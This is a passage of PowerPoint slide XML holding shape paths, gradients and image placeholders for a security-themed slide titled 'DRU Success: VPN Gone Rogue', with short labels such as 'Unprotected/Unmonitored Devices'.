                    <a:pt x="1148262" y="479597"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1087004" y="505507"/>
                    <a:pt x="1044021" y="566163"/>
                    <a:pt x="1044021" y="636859"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1054473" y="688631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024168" y="694750"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="962910" y="720660"/>
                    <a:pt x="919927" y="781316"/>
                    <a:pt x="919927" y="852012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="919927" y="899143"/>
                    <a:pt x="939031" y="941811"/>
                    <a:pt x="969917" y="972698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="978998" y="978821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977587" y="979106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="916329" y="1005016"/>
                    <a:pt x="873346" y="1065672"/>
                    <a:pt x="873346" y="1136368"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="880413" y="1171373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811434" y="1223714"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="780645" y="1243791"/>
                    <a:pt x="748183" y="1261812"/>
                    <a:pt x="714200" y="1277544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="580284" y="1339172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446368" y="1277544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174559" y="1151677"/>
                    <a:pt x="0" y="879345"/>
                    <a:pt x="0" y="579401"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="133916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82131" y="124553"/>
                    <a:pt x="171841" y="110272"/>
                    <a:pt x="267832" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384325" y="63819"/>
                    <a:pt x="488793" y="32590"/>
                    <a:pt x="580284" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK"/>
            </a:p>
          </p:txBody>
        </p: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1679779-AF00-47CA-44B5-DD6C164F336F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9180513" y="4546123"/>
            <a:ext cx="0" cy="1929014"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="33000">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="1"/>
              <a:tileRect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FE173FA-EBBF-F977-8A92-0C917D5C6D37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8052797" y="5200040"/>
            <a:ext cx="2255432" cy="592792"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13165"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent4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2700000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Located</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs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3880A1B-72A6-74CC-6A86-4214EAE231B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4792485" y="6475137"/>
            <a:ext cx="8717404" cy="2853744"/>
            <a:chOff x="7177998" y="405422"/>
            <a:chExt cx="8717404" cy="2853744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle: Rounded Corners 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA80BD60-9064-BC6E-DF27-384ADE4F29E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7177998" y="405422"/>
              <a:ext cx="8717404" cy="2853744"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4822"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect l="-174431" t="-31679" r="-146991" b="-247925"/>
              </a:stretch>
            </a:blipFill>
            <a:ln>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent4"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="189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348A91D-F268-78AA-53BD-714CD3CB1218}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9070953" y="774301"/>
              <a:ext cx="49171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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Fedra Sans Alt Pro Book LF"/>
                </a:rPr>
                <a:t>Unprotected/Unmonitored Devices</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E7A96E-E241-D785-4CCA-62724F8BC2C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10809185" y="7509132"/>
            <a:ext cx="1586749" cy="1267673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B9625EC4-F0EA-A103-F97F-FF73DD465298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10857186" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
            <a:chOff x="10857186" y="7854532"/>
            <a:chExt cx="1068114" cy="706529"/>
          </a:xfrm>
        </p:grpSpPr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0A5DDD1C-40AC-AF10-5658-1E65837F5E71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10857186" y="7854532"/>
              <a:ext cx="1068114" cy="706529"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13671"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274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CA89F26A-2DD4-AFA0-B50F-E26A565D5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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10976825" y="8110712"/>
              <a:ext cx="832143" cy="194167"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Graphic 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6EF4461-C8C2-813B-7729-AA5B886244A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8350625" y="7509132"/>
            <a:ext cx="1586749" cy="1267673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973FB0D8-DF82-8F04-624B-23E638D30C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8398626" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
            <a:chOff x="10857186" y="7854532"/>
            <a:chExt cx="1068114" cy="706529"/>
          </a:xfrm>
        </p:grpSpPr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D553C886-B7DA-4699-9864-C48D17A71AF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10857186" y="7854532"/>
              <a:ext cx="1068114" cy="706529"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13671"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274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96A2614D-F058-A2FD-49CB-7B82D4B07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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10976825" y="8110712"/>
              <a:ext cx="832143" cy="194167"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Graphic 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E728D3CF-05E0-34F5-6DB5-9B3A413FE20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5901282" y="7509132"/>
            <a:ext cx="1586749" cy="126767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6B0A4788-779F-A684-550F-3FBD6719EF92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5949283" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
            <a:chOff x="10857186" y="7854532"/>
            <a:chExt cx="1068114" cy="706529"/>
          </a:xfrm>
        </p:grpSpPr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3C40DE7B-3A17-316A-676B-8A32E300D95C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10857186" y="7854532"/>
              <a:ext cx="1068114" cy="706529"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13671"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274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33CBC6E0-793C-51BA-985C-D52737BD2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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10976825" y="8110712"/>
              <a:ext cx="832143" cy="1941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859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381B8-E1B0-68F1-679F-6943CC0502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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90B7C7F-B454-A743-C2A5-4BACC4A4299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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD9B306-14DA-CCDC-A5BA-89E8440F2FE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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC60188-6D3B-50F3-50D7-FD90F71DD77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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35979D38-1EF4-348E-7771-9208D50592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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{555B48D8-3C9A-F860-154B-EA95C85C9E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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A69CA9F-41B0-5938-D030-E24DDBAF0D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="892285"/>
            <a:ext cx="14745843" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DRU Success: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VPN Gone Rogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Rectangle: Rounded Corners 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{766CC2B7-EAA2-6090-5AFE-647484232D3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5409791" y="2616373"/>
            <a:ext cx="7541443" cy="1917104"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12415"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect t="-23893" r="-7284" b="-248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srgbClr val="525252"/>
              </a:solidFill>
              <a:latin typeface="IntelOne Display Regular"/>
              <a:cs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78B28FD-FA67-5E45-77A1-02F3736F0963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9313426" y="741254"/>
            <a:ext cx="726372" cy="838155"/>
            <a:chOff x="14027225" y="3493572"/>
            <a:chExt cx="1160569" cy="1339172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4758233-09FE-5E42-C4A9-F3771BACA08E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14518214" y="3850697"/>
              <a:ext cx="178590" cy="178538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                  <a:moveTo>
                    <a:pt x="178590" y="89243"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178590" y="138572"/>
                    <a:pt x="138624" y="178538"/>
                    <a:pt x="89295" y="178538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39966" y="178538"/>
                    <a:pt x="0" y="138572"/>
                    <a:pt x="0" y="89243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="39966"/>
                    <a:pt x="39966" y="0"/>
                    <a:pt x="89295" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138624" y="0"/>
                    <a:pt x="178590" y="39966"/>
                    <a:pt x="178590" y="89243"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK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A885783-F287-C361-5236-C9C14ECEAE2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14027225" y="3493572"/>
              <a:ext cx="1160569" cy="1339172"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                  <a:moveTo>
                    <a:pt x="580284" y="267885"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="481679" y="267885"/>
                    <a:pt x="401748" y="347764"/>
                    <a:pt x="401748" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401748" y="529434"/>
                    <a:pt x="458453" y="599531"/>
                    <a:pt x="535664" y="619147"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="535664" y="982032"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="535664" y="1006566"/>
                    <a:pt x="555751" y="1026653"/>
                    <a:pt x="580284" y="1026653"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="714200" y="1026653"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="1026653"/>
                    <a:pt x="758821" y="1006566"/>
                    <a:pt x="758821" y="982032"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="957499"/>
                    <a:pt x="738734" y="937411"/>
                    <a:pt x="714200" y="937411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="937411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="848116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714200" y="848116"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="848116"/>
                    <a:pt x="758821" y="828029"/>
                    <a:pt x="758821" y="803495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="778962"/>
                    <a:pt x="738734" y="758875"/>
                    <a:pt x="714200" y="758875"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="758875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="619147"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="702116" y="599542"/>
                    <a:pt x="758821" y="529439"/>
                    <a:pt x="758821" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="347764"/>
                    <a:pt x="678943" y="267885"/>
                    <a:pt x="580284" y="267885"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="580284" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="671776" y="32590"/>
                    <a:pt x="776241" y="63873"/>
                    <a:pt x="892737" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="988728" y="110272"/>
                    <a:pt x="1078441" y="124552"/>
                    <a:pt x="1160569" y="133916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1160569" y="477112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148262" y="479597"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1087004" y="505507"/>
                    <a:pt x="1044021" y="566163"/>
                    <a:pt x="1044021" y="636859"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1054473" y="688631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024168" y="694750"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="962910" y="720660"/>
                    <a:pt x="919927" y="781316"/>
                    <a:pt x="919927" y="852012"/>
